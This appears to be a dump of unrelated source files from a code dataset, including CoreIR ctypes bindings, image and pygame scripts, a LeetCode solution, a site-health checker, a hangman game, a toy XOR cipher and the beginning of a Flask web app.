COREWireable_p\n\nlibcoreir_c.COREModuleDefGetInterface.argtypes = [COREModuleDef_p]\nlibcoreir_c.COREModuleDefGetInterface.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefGetInstances.argtypes = [COREModuleDef_p, ct.POINTER(ct.c_uint)]\nlibcoreir_c.COREModuleDefGetInstances.restype = ct.POINTER(COREWireable_p)\n\nlibcoreir_c.COREModuleGetDirectedModule.argtypes = [COREModule_p]\nlibcoreir_c.COREModuleGetDirectedModule.restype = COREDirectedModule_p\n\nlibcoreir_c.COREGetInstRefName.argtypes = [COREWireable_p]\nlibcoreir_c.COREGetInstRefName.restype = ct.c_char_p\n\nlibcoreir_c.COREGetConfigValue.argtypes = [COREWireable_p,ct.c_char_p]\nlibcoreir_c.COREGetConfigValue.restype = COREArg_p;\n\nlibcoreir_c.COREGetArgKind.argtypes = [COREArg_p]\nlibcoreir_c.COREGetArgKind.restype = ct.c_int\n\nlibcoreir_c.COREArgStringGet.argtypes = [COREArg_p]\nlibcoreir_c.COREArgStringGet.restype = ct.c_char_p\n\nlibcoreir_c.COREArgIntGet.argtypes = [COREArg_p]\nlibcoreir_c.COREArgIntGet.restype = ct.c_int\n\nlibcoreir_c.COREArgInt.argtypes = [COREContext_p,ct.c_int]\nlibcoreir_c.COREArgInt.restype = COREArg_p\n\nlibcoreir_c.COREArgString.argtypes = [COREContext_p,ct.c_char_p]\nlibcoreir_c.COREArgString.restype = COREArg_p\n\nlibcoreir_c.COREModuleDefGetConnections.argtypes = [COREModuleDef_p, 
ct.POINTER(ct.c_int)]\nlibcoreir_c.COREModuleDefGetConnections.restype = ct.POINTER(COREConnection_p)\n\nlibcoreir_c.COREConnectionGetFirst.argtypes = [COREConnection_p]\nlibcoreir_c.COREConnectionGetFirst.restype = COREWireable_p\n\nlibcoreir_c.COREConnectionGetSecond.argtypes = [COREConnection_p]\nlibcoreir_c.COREConnectionGetSecond.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefConnect.argtypes = [COREModuleDef_p, COREWireable_p, COREWireable_p]\n\nlibcoreir_c.COREPrintModuleDef.argtypes = [COREModuleDef_p]\n\nlibcoreir_c.COREWireableGetConnectedWireables.argtypes = [COREWireable_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREWireableGetConnectedWireables.restype = ct.POINTER(COREWireable_p)\n\nlibcoreir_c.COREWireableGetModuleDef.argtypes = [COREWireable_p]\nlibcoreir_c.COREWireableGetModuleDef.restype = COREModuleDef_p\n\nlibcoreir_c.COREWireableSelect.argtypes = [COREWireable_p, ct.c_char_p]\nlibcoreir_c.COREWireableSelect.restype = COREWireable_p\n\nlibcoreir_c.COREWireableGetSelectPath.argtypes = [COREWireable_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREWireableGetSelectPath.restype = ct.POINTER(ct.c_char_p)\n\nlibcoreir_c.COREWireableGetType.argtypes = [COREWireable_p]\nlibcoreir_c.COREWireableGetType.restype = COREType_p\n\nlibcoreir_c.COREModuleDefSelect.argtypes = [COREModuleDef_p, ct.c_char_p]\nlibcoreir_c.COREModuleDefSelect.restype = COREWireable_p\n\nlibcoreir_c.COREModuleDefGetModule.argtypes = [COREModuleDef_p]\nlibcoreir_c.COREModuleDefGetModule.restype = COREModule_p\n\nlibcoreir_c.CORENamespaceGetName.argtypes = [CORENamespace_p]\nlibcoreir_c.CORENamespaceGetName.restype = ct.c_char_p\n\n# libcoreir_c.CORESelectGetParent.argtypes = [COREWireable_p]\n# libcoreir_c.CORESelectGetParent.restype = COREWireable_p\n\nlibcoreir_c.COREDirectedModuleSel.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_char_p), ct.c_int]\nlibcoreir_c.COREDirectedModuleSel.restype = COREWireable_p\n\nlibcoreir_c.COREDirectedModuleGetInstances.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_uint)]\nlibcoreir_c.COREDirectedModuleGetInstances.restype = ct.POINTER(COREDirectedInstance_p)\n\nlibcoreir_c.COREDirectedModuleGetInputs.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedModuleGetInputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedModuleGetOutputs.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedModuleGetOutputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedModuleGetConnections.argtypes = [COREDirectedModule_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedModuleGetConnections.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedConnectionGetSrc.argtypes = [COREDirectedConnection_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedConnectionGetSrc.restype = ct.POINTER(ct.c_char_p)\n\nlibcoreir_c.COREDirectedConnectionGetSnk.argtypes = [COREDirectedConnection_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedConnectionGetSnk.restype = ct.POINTER(ct.c_char_p)\n\nlibcoreir_c.COREDirectedInstanceGetInputs.argtypes = [COREDirectedInstance_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedInstanceGetInputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREDirectedInstanceGetOutputs.argtypes = [COREDirectedInstance_p, ct.POINTER(ct.c_int)]\nlibcoreir_c.COREDirectedInstanceGetOutputs.restype = ct.POINTER(COREDirectedConnection_p)\n\nlibcoreir_c.COREArrayTypeGetLen.argtypes = [COREType_p]\nlibcoreir_c.COREArrayTypeGetLen.restype = 
ct.c_uint\n\nlibcoreir_c.COREGetTypeKind.argtypes = [COREType_p]\nlibcoreir_c.COREGetTypeKind.restype = ct.c_int # CORETypeKind is an enum\n\nlibcoreir_c.CORETypeGetSize.argtypes = [COREType_p]\nlibcoreir_c.CORETypeGetSize.restype = ct.c_uint\n\nlibcoreir_c.COREInstanceGetGenArgs.argtypes = [COREWireable_p, ct.POINTER(ct.POINTER(ct.c_char_p)), ct.POINTER(ct.POINTER(COREArg_p)), ct.POINTER(ct.c_int)]\nlibcoreir_c.COREInstanceGetGenArgs.restype = None\n","sub_path":"bindings/python/coreir/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138986913","text":"from PIL import Image\nfrom ImgResize import imgresize\nimport numpy as np\nimport os\nimport shutil\n\n\nbaseurl = r'C:\\Users\\jiangt6\\Downloads\\韩漫\\恋爱辅助器\\01-111-combine'\ndisturl = r'C:\\Users\\jiangt6\\Downloads\\韩漫\\恋爱辅助器\\01-111-dst'\nfiles = os.listdir(baseurl)\n\n\ndstcounter = 6000\n\nmaxjpgdim = 50000\ncurjpgdim = 0\n\nsectionstartfile = True\n\nfor file in files:\n\n if sectionstartfile:\n print('Base Image ' + file)\n baseimg = imgresize(Image.open(baseurl + os.sep + file))\n curjpgdim = baseimg.size[1]\n basemat = np.atleast_2d(baseimg)\n sectionstartfile = False\n else:\n print('Appending Image ' + file)\n appendimg = imgresize(Image.open(baseurl + os.sep + file))\n curjpgdim = curjpgdim + appendimg.size[1]\n appendmat = np.atleast_2d(appendimg)\n basemat = np.append(basemat, appendmat, axis=0)\n if curjpgdim > maxjpgdim:\n print('Current JPG Dim: ' + str(curjpgdim))\n report_img = Image.fromarray(basemat)\n report_img.save(disturl + os.sep + str(dstcounter) + '.jpg')\n print('Save Pic ' + str(dstcounter) + '.jpg')\n print('********************************************')\n print()\n dstcounter = dstcounter + 1\n sectionstartfile = True\n\nreport_img = Image.fromarray(basemat)\nreport_img.save(disturl + os.sep + str(dstcounter) + '.jpg')\nprint('Save Pic ' + str(dstcounter) + '.jpg')\ndstcounter = dstcounter + 1\n","sub_path":"Img Merge/ImgMerge.py","file_name":"ImgMerge.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"236132470","text":"# FB tag frequency top 100\n# Premium\n# https://leetcode.com/problems/buildings-with-an-ocean-view/\n# return buildings with an ocean view\n\n# O(n) time and space\nclass Solution:\n def findBuildings(self, heights: List[int]) -> List[int]:\n # last element always fulfils\n answer = [len(heights) - 1]\n \n max_height = 0\n for i in range(1, len(heights)):\n max_height = max(heights[-i], max_height)\n if heights[-i-1] > max_height:\n answer.append(len(heights) - i - 1)\n \n answer.reverse()\n return answer","sub_path":"leetcode/1762_BuildingsWithAnOceanView.py","file_name":"1762_BuildingsWithAnOceanView.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124193035","text":"import pygame\nfrom pygame.locals import *\nfrom sys import exit\nfrom random import randint\n\ntext1 = \"红艳艳的都市十分繁华\" # story text (displayed subtitle)\nred = 255, 0, 0\nblack = 0, 0, 0\nwhite = 255, 255, 255\nSPEED_FACTOR = 0.005 # speed of the colour fade\nfactor1 = 0\nticks = 0\nspeed_text = -2\npos_x1 = randint(25, 725) # x coordinate of the intro text (ideally hand-tuned)\npos_y1 = 490 # y coordinate of the intro text (at the bottom of the window)\n\nglobal_v_idx = 0\n\n\npygame.init() # initialise pygame\npygame.font.init()\npygame.mixer.init()\npygame.time.delay(1000) # wait one second after initialising\nwin_size = width, height = 1100, 500 # 
set the window size\nwin = pygame.display.set_mode(win_size) # show the window\npygame.display.set_caption(\"夜已—测试版\") # window title\n\nclock = pygame.time.Clock() # create the game clock\n\n\ndef drawText(content, color=red, size=50): # helper that renders a piece of text\n myfont = pygame.font.Font(\"Xingkai.ttc\", size) # font and size\n textImage = myfont.render(content, True, color)\n return textImage\n\ndef blend_color(color1=red, color2=black, blend_factor=0.5): # colour fade implementation\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n r = r1 + (r2 - r1) * blend_factor\n g = g1 + (g2 - g1) * blend_factor\n b = b1 + (b2 - b1) * blend_factor\n return int(r), int(g), int(b)\n\ndef draw_subtitles(text, pos_x, pos_y, factor):\n ## global speed_text\n #if time1 <= tick <= time2:\n position = pos_x, pos_y\n pos_y += speed_text\n\n # win.blit(drawText(text, white), position)\n\n win.blit(drawText(text, blend_color(blend_factor=factor)), position)\n\n\ndef draw_from_arr(in_idx, tick):\n if 0 <= in_idx < len(text_arr):\n itemarr = text_arr[in_idx]\n txt = itemarr[0]\n tmp_posx = int(itemarr[1])\n\n tmp_posy = int(itemarr[2]) - 1\n text_arr[in_idx][2] = str(tmp_posy)\n\n tmp_factor = float(itemarr[3]) + SPEED_FACTOR\n if tmp_factor >= 1:\n tmp_factor = 1\n text_arr[in_idx][3] = str(tmp_factor)\n\n\n draw_subtitles(txt, tmp_posx, tmp_posy, tmp_factor) # text 1\n\n\ntext_arr = []\nwith open(\"subtitles.txt\") as fdata:\n while True:\n line = fdata.readline()\n if not line:\n break\n if not line.startswith(\"#\"):\n text_arr.append(line.split(\"|\"))\n for i in range(len(text_arr)):\n if int(text_arr[i][1]) == 0:\n text_arr[i][1] = str(randint(25,750))\n\n\nidx = 0\nprint(text_arr)\ncurr_txt = ''\n\nslow_tick = 0\n\nwhile True:\n win.fill(black) # background colour (bgcolor); fill first so it does not cover anything drawn later\n\n clock.tick(150) # run at 150 ticks per second\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # quit the game\n pygame.quit()\n exit()\n\n tisks = pygame.time.get_ticks() # absolute time since the game started\n tmp_tick = tisks\n idx = int(tmp_tick/3000) - 2\n\n if 0 <= idx < len(text_arr):\n if curr_txt != text_arr[idx][0]:\n curr_txt = text_arr[idx][0]\n print(\"idx=\",idx, \" subtitle:\", curr_txt)\n\n draw_from_arr(idx - 4, tmp_tick)\n draw_from_arr(idx - 3, tmp_tick)\n draw_from_arr(idx - 2, tmp_tick)\n draw_from_arr(idx - 1, tmp_tick)\n draw_from_arr(idx, tmp_tick)\n\n pygame.display.update() # refresh the whole display\n","sub_path":"草稿.py","file_name":"草稿.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"580980101","text":"import tensorflow as tf\nfrom tensorflow.python.estimator import estimator\n\n\ndef bilstm_crf_fn(word_idx, label_idx, params, mode):\n word_vocab_size = params['word_vocab_size']\n word_emb_size = params['word_emb_size']\n lstm_hidden = params['lstm_hidden']\n\n word_emb = tf.get_variable('word_embeddings',\n [word_vocab_size, word_emb_size])\n lookuped_word_emb = tf.nn.embedding_lookup(word_emb, word_idx)\n # actual sequence lengths, assuming word id 0 marks padding\n seq_lengths = tf.reduce_sum(tf.sign(word_idx), axis=1)\n\n fwd_lstm_cell = tf.contrib.rnn.LSTMCell(lstm_hidden)\n bwd_lstm_cell = tf.contrib.rnn.LSTMCell(lstm_hidden)\n\n # run the bi-LSTM over the looked-up embeddings, not the raw embedding table\n (out_fw, out_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n fwd_lstm_cell,\n bwd_lstm_cell, lookuped_word_emb, sequence_length=seq_lengths,\n dtype=tf.float32)\n\n context_rep = tf.concat([out_fw, out_bw], axis=-1)\n\n\n\n\n\n\nclass BiLSTMSeqLabelor(estimator.Estimator):\n def __init__(self, model_dir, params, config=None, warm_start_from=None):\n\n super(BiLSTMSeqLabelor, self).__init__(\n model_dir, params, config, warm_start_from\n 
)\n\n","sub_path":"inhousednn/task/sequence_labeling/BiLSTMSeqLabelor.py","file_name":"BiLSTMSeqLabelor.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99839800","text":"import argparse\nimport os\nimport requests\nimport whois\nfrom datetime import datetime\n\n\ndef load_urls4check(path):\n if not os.path.exists(path):\n return None\n with open(path) as f_urls:\n urls = f_urls.read().strip().split()\n return urls\n\n\ndef is_server_respond_with_200(url):\n try:\n return requests.get(url).status_code == 200\n except requests.exceptions.ConnectionError:\n return None\n except requests.exceptions.TooManyRedirects:\n return None\n\n\ndef is_domain_extended_enough(domain_name):\n days_in_month = 30\n query = whois.whois(domain_name)\n if not query.expiration_date:\n return None\n if isinstance(query.expiration_date, list):\n expiration_date = query.expiration_date[0]\n else:\n expiration_date = query.expiration_date\n if (expiration_date - datetime.now()).days <= days_in_month:\n return False\n return True\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"filepath\", type=str, help=\"Path to file with URLs\")\n return parser.parse_args()\n\n\ndef get_test_results(urls):\n formatted_server_respond_domain_extend = [\"{} | {} | {}\".format(\n url, \"Good. Server is responding 200.\" if is_server_respond_with_200(url) else \"!SOMETHING WRONG!\",\n \"Domain extended enough.\" if is_domain_extended_enough(url) else \"!DOMAIN ISN'T EXTENDED ENOUGH!\")\n for url in urls]\n return formatted_server_respond_domain_extend\n\nif __name__ == '__main__':\n args = arg_parser()\n urls = load_urls4check(args.filepath)\n if urls:\n test_results = get_test_results(urls)\n print(*test_results, sep=\"\\n\")\n else:\n print(\"File does not exist\")\n","sub_path":"check_sites_health.py","file_name":"check_sites_health.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"469937652","text":"#!/usr/bin/env python3\n\"\"\"\nTestbench for the image_write module.\n\"\"\"\n\nfrom typing import Dict\n\nimport testbench as dut # type: ignore\n\n\ndef concat_cfg1(arg0: int) -> int:\n return (arg0 & 0xffffffff)\n\n\ndef concat_cfg2(arg1: int, arg0: int) -> int:\n shift_arg0 = (arg0 & 0x0000ffff)\n shift_arg1 = (arg1 & 0x0000ffff) << 16\n\n return (shift_arg1 | shift_arg0)\n\n\ndef concat_cfg4(arg3: int, arg2: int, arg1: int, arg0: int) -> int:\n shift_arg0 = (arg0 & 0x000000ff)\n shift_arg1 = (arg1 & 0x000000ff) << 8\n shift_arg2 = (arg2 & 0x000000ff) << 16\n shift_arg3 = (arg3 & 0x000000ff) << 24\n\n return (shift_arg3 | shift_arg2 | shift_arg1 | shift_arg0)\n\n\ndef setup():\n \"\"\" Set starting DUT values and reset module \"\"\"\n\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [0])\n dut.prep(\"cfg_valid\", [0])\n dut.prep(\"str_img_bus\", [0])\n dut.prep(\"str_img_val\", [0])\n dut.prep(\"image_rdy\", [0])\n\n # reset module\n dut.prep(\"rst\", [1])\n dut.tick()\n\n dut.prep(\"rst\", [0])\n for _ in range(2):\n dut.tick()\n\n\ndef config_write(start_addr: int, step_pixel: int, step_row: int,\n img: Dict[str, int], mem_select: int) -> None:\n \"\"\" send write configuration \"\"\"\n\n # CFG_IW_IMG_W\n dut.prep(\"cfg_data\", [(img['width']-1)])\n dut.prep(\"cfg_addr\", [9])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IW_START\n dut.prep(\"cfg_data\", [concat_cfg2(start_addr, 
(img['height']-1))])\n dut.prep(\"cfg_addr\", [10])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IW_STEP\n dut.prep(\"cfg_data\", [concat_cfg2((step_pixel-1), (step_row-1))])\n dut.prep(\"cfg_addr\", [11])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IMG_WR\n dut.prep(\"cfg_data\", [mem_select])\n dut.prep(\"cfg_addr\", [3])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [0])\n dut.prep(\"cfg_valid\", [0])\n for _ in range(3):\n dut.tick()\n\n\ndef config_read(img: Dict[str, int], pad: Dict[str, int],\n maxp_side: int, conv: Dict[str, int], mem_select: int) -> None:\n \"\"\" send read configuration \"\"\"\n\n # CFG_IR_IMG_W\n dut.prep(\"cfg_data\", [concat_cfg1(img['width']-1)])\n dut.prep(\"cfg_addr\", [5])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IR_IMG_DH\n dut.prep(\"cfg_data\", [concat_cfg2((img['depth']-1), (img['height']-1))])\n dut.prep(\"cfg_addr\", [6])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IR_PAD\n dut.prep(\"cfg_data\", [concat_cfg4(pad['left'], pad['right'],\n pad['top'], pad['bottom'])])\n dut.prep(\"cfg_addr\", [7])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IR_CONV\n dut.prep(\"cfg_data\", [concat_cfg4((maxp_side-1), (conv['side']-1),\n 0, (conv['step']-1))])\n dut.prep(\"cfg_addr\", [8])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n # CFG_IMG_RD\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [4])\n dut.prep(\"cfg_valid\", [1])\n dut.tick()\n\n dut.prep(\"cfg_data\", [0])\n dut.prep(\"cfg_addr\", [0])\n dut.prep(\"cfg_valid\", [0])\n for _ in range(3):\n dut.tick()\n\n\n# parameters\nparam = {}\nparam['CFG_DWIDTH'] = 32\nparam['CFG_AWIDTH'] = 5\nparam['STR_IMG_WIDTH'] = 64\nparam['GROUP_NB'] = 4\nparam['IMG_WIDTH'] = 16\nparam['DEPTH_NB'] = 16\nparam['MEM_AWIDTH'] = 16\n\n# cfg values\nimg_width = 10 # image width\nimg_height = 5 # image height\nimg_depth = 8 # image depth\n\nstart_addr = 0 # starting offset\nstep_pixel = 4 # distance to step to next pixel\nstep_row = 10 # distance to step to next row\n\npad_left = 1 # padding around left image\npad_right = 1 # padding around right image\npad_top = 1 # padding around top image\npad_bottom = 1 # padding around bottom image\n\nmaxp_side = 2 # maxp_side value of one will turn maxpooling off\nconv_side = 3 # square side of conv e.g. 
3x3\nconv_step = 2 # distance to step for next conv volume\n\nwr_mem_select = 0 # select the image_write buffer to activate\nrd_mem_select = 0 # select the image_read buffer to activate\n\nstream_nb = int(img_width * img_height * step_pixel *\n (param['IMG_WIDTH'] * param['DEPTH_NB'] / param['STR_IMG_WIDTH']))\n\n\ndut.init()\n\nsetup()\n\nconfig_write(\n start_addr, step_pixel, step_row,\n {'width': img_width, 'height': img_height, 'depth': img_depth},\n wr_mem_select)\n\n\ncnt = 1\nfor _ in range(stream_nb):\n dut.prep(\"str_img_val\", [1])\n dut.prep(\"str_img_bus\", [cnt])\n\n io = dut.tick()\n\n if io['str_img_rdy'] == 1:\n # sample the rdy to see if the data has been moved into the pipeline,\n # if both rdy & val are high we increment to the 'next' data\n cnt = cnt + 1\n\ndut.prep(\"str_img_val\", [0])\ndut.prep(\"str_img_bus\", [0])\n\n\nconfig_read(\n {'width': img_width, 'height': img_height, 'depth': img_depth},\n {'left': pad_left, 'right': pad_right, 'top': pad_top, 'bottom': pad_bottom},\n maxp_side,\n {'side': conv_side, 'step': conv_step},\n rd_mem_select)\n\n\ndut.prep(\"image_rdy\", [1])\n\nio = dut.tick()\nwhile io['image_last'] == 0:\n io = dut.tick()\n\nfor _ in range(100):\n io = dut.tick()\n\n\ndut.finish()\n","sub_path":"dut/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"166305205","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\ndesc:\nauthor: huha\n'''\nclass xor:\n def __init__(self,key):\n self.key = key\n def en(self,a):\n enstr = bytearray()\n for x in range(len(a)):\n enstr.append(a[x]^self.key[x%len(self.key)])\n return enstr\n\n def de(self,enstr):\n a = bytearray()\n for x in range(len(enstr)):\n a.append(enstr[x] ^ self.key[x % len(self.key)])\n return a\n\n def enfile(self,file):\n a = file.read()\n with open(file.filename+'_en','wb') as f:\n f.write(self.en(a))\n\n def defile(self,file):\n enstr = file.read()\n with open(file.filename+'_de','wb') as f:\n f.write(self.en(enstr))\n\n\nif __name__ == '__main__':\n a = bytes('sdfadf','utf8')\n key = bytes('123_哈', 'utf8')\n xor = xor(key)\n enstr = xor.en(a)\n print(xor.de(enstr).decode())","sub_path":"Xor算法/flaskr/mimaxue.py","file_name":"mimaxue.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"587442336","text":"import re\n\ngrammar = \"\"\"\n S : + S S\n S : * S S\n S : ~ S\n S : n\n\n n : /[0-9]+/\n\"\"\"\n\nclass Token(str):\n kind : str\n def __new__(cls, value, kind):\n tk = str.__new__(cls, value)\n tk.kind = kind\n return tk\n\n def __repr__(self):\n value = super().__repr__()\n return value\n\nREGEX_MAP = {\n \"n\" : r\"[0-9]+\",\n \"op\" : r\"[+*~]\",\n \"ws\" : r\"\\s+\",\n \"erro\": r\".\"\n}\n\n\nREGEX = re.compile(\"|\".join(f\"(?P<{k}>{v})\" for k, v in REGEX_MAP.items()))\n\ndef lex(str):\n tokens = []\n for m in REGEX.finditer(str):\n kind = m.lastgroup\n value = str[m.start():m.end()]\n tk = Token(value, kind)\n if kind == \"ws\":\n continue \n elif kind == \"erro\":\n raise SyntaxError(r\"Bad token: {tk}\")\n else:\n tokens.append(tk)\n return tokens\n\n\ndef parse(str):\n tokens = lex(str)\n tokens.append(\"$\")\n res = S(tokens)\n if tokens != [\"$\"]:\n raise SyntaxError(\"espera o fim do arquivo\")\n return res\n\n\ndef expect(token, tokens):\n aux_token = tokens.pop(0)\n if aux_token != token:\n raise SyntaxError(f\"Bad token: 
{aux_token}\")\n\n\ndef S(tokens):\n tk = tokens[0]\n\n if tk == \"+\":\n tokens.pop(0)\n left = S(tokens)\n right = S(tokens)\n return left + right\n\n elif tk == \"*\":\n tokens.pop(0)\n left = S(tokens)\n right = S(tokens)\n return left * right\n\n elif tk == \"~\":\n tokens.pop(0)\n res = S(tokens)\n return ~ res\n \n tk = tokens.pop(0)\n if tk.kind == \"n\":\n return int(tk)\n\n\nsrc1 = \"~ 1\"\nsrc2 = \"+ 3 3\"\nsrc3 = \"* 2 6\"\nsrc4 = \"+ 7 * 2 5\"\nsrc5 = \"50\"\n\nassert parse(src1) == -2\nassert parse(src2) == 6\nassert parse(src3) == 12\nassert parse(src4) == 17\nassert parse(src5) == 50","sub_path":"respostas/algoritmos/rd-prog/rd-prog-q1.py","file_name":"rd-prog-q1.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"403770760","text":"import getpass #TODO add for 2p version\nimport string\n\nimport game_functions as core\n\ndef strikes_art(n):\n strike0 = \" ___ \\n\\\n / | \\n\\\n | \\n\\\n | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike1 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike2 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n | | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike3 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /| | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike4 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /|\\ | \\n\\\n | \\n\\\n | \\n\\\n----------\\n\"\n\n strike5 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /|\\ | \\n\\\n / | \\n\\\n | \\n\\\n----------\\n\"\n\n strike6 = \" ___ \\n\\\n / | \\n\\\n o | \\n\\\n /|\\ | \\n\\\n / \\ | \\n\\\n | \\n\\\n----------\\n\"\n\n drawings = [strike0, strike1, strike2, strike3, strike4, strike5, strike6]\n return drawings[n]\n\ndef main_game():\n guess_pool = list(string.ascii_lowercase)\n \n target = getpass.getpass(\"What is the target word?\\n\") # TODO add for 2p version\n #target = \"cat\" # TODO get random word from list of common hangman words\n target_list = list(target)\n letters_remaining = []\n\n for i in target:\n if i not in letters_remaining:\n letters_remaining.append(i)\n \n check_word = \"*\" * len(target) # TODO allow for target with multiple words\n check_list = list(check_word)\n \n core.print_slow(\"Welcome to Hangman, good luck guessing the word!\\n\")\n\n strikes = 0\n while strikes < 6:\n core.print_slow(strikes_art(strikes))\n core.print_slow(\"\".join(check_list) + \"\\n\")\n user_guess = input(core.print_slow(\"\\nYour guess:\")) # TODO won't print slow\n\n if user_guess not in guess_pool:\n core.print_slow(\"That guess is either not valid or has already been used, please guess again.\\n\")\n \n elif user_guess not in letters_remaining:\n strikes += 1\n core.print_slow(\"You have %s incorrect guesses remaining.\\n\" %(str(6 - strikes)))\n \n elif user_guess in letters_remaining:\n guess_pool.remove(user_guess)\n letters_remaining.remove(user_guess)\n \n store_index = [i for i, x in enumerate(target_list) if x == user_guess]\n for i in store_index:\n check_list[i] = user_guess\n\n if len(letters_remaining) == 0:\n core.print_slow(\"\".join(check_list) + \"\\n\")\n return core.print_slow(\"You've won!\\n\")\n\n core.print_slow(strikes_art(strikes))\n return core.print_slow(\"Sorry you ran out of tries! 
The word you were trying to guess was: \\n%s\\n\" %(target))\n \ndef main():\n main_game()\n core.play_again(main_game)\n\nif __name__ == \"__main__\":\n main()","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"334923417","text":"\"\"\"\nThis script runs the application using a development server.\nIt contains the definition of routes and views for the application.\n\"\"\"\n\n\nfrom flask import (\n render_template,\n Flask,\n Response,\n stream_with_context,\n url_for,\n render_template,\n redirect,\n request,\n)\nfrom json import dumps\nfrom forms import DeviceConfigureForm, DeviceScanForm\nfrom sources import get_source\nimport json\nfrom flask_cors import CORS\nfrom errors import errors\n\napp = Flask(__name__, static_folder=\"./webui/build\", static_url_path=\"/\")\napp.register_blueprint(errors)\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n\n\napp.config[\"CONFIG_SAMPLES_PER_PACKET\"] = 32\napp.config[\"SECRET_KEY\"] = \"any secret string\"\napp.config[\"CONFIG_SAMPLE_RATE\"] = None\napp.config[\"SOURCE_SAMPLES_PER_PACKET\"] = None\napp.config[\"DATA_SOURCE\"] = None\napp.config[\"CONFIG_COLUMNS\"] = []\napp.config[\"SERIAL_PORT\"] = None\napp.config[\"TCPIP\"] = None\napp.config[\"BLE_DEVICE_ID\"] = None\napp.config[\"STREAMING_SOURCE\"] = None\napp.config[\"RESULT_SOURCE\"] = None\napp.config[\"MODE\"] = \"\"\napp.config[\"STREAMING\"] = False\napp.config[\"BAUD_RATE\"] = 460800\napp.config[\"CLASS_MAP\"] = None\napp.config[\"TEST_DEVICE\"] = None\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\n\ndef cache_config(config):\n tmp = {\n \"CONFIG_SAMPLE_RATE\": app.config[\"CONFIG_SAMPLE_RATE\"],\n \"DATA_SOURCE\": app.config[\"DATA_SOURCE\"],\n \"CONFIG_COLUMNS\": app.config[\"CONFIG_COLUMNS\"],\n \"BLE_DEVICE_ID\": app.config[\"BLE_DEVICE_ID\"],\n \"SERIAL_PORT\": app.config[\"SERIAL_PORT\"],\n \"MODE\": app.config[\"MODE\"],\n \"TCPIP\": app.config[\"TCPIP\"],\n \"TEST_DEVICE\": app.config[\"TEST_DEVICE\"],\n \"SOURCE_SAMPLES_PER_PACKET\":app.config[\"SOURCE_SAMPLES_PER_PACKET\"]\n }\n json.dump(tmp, open(\"./.config.cache\", \"w\"))\n\n\n@app.route(\"/\")\ndef main():\n return app.send_static_file(\"index.html\")\n\n\ndef 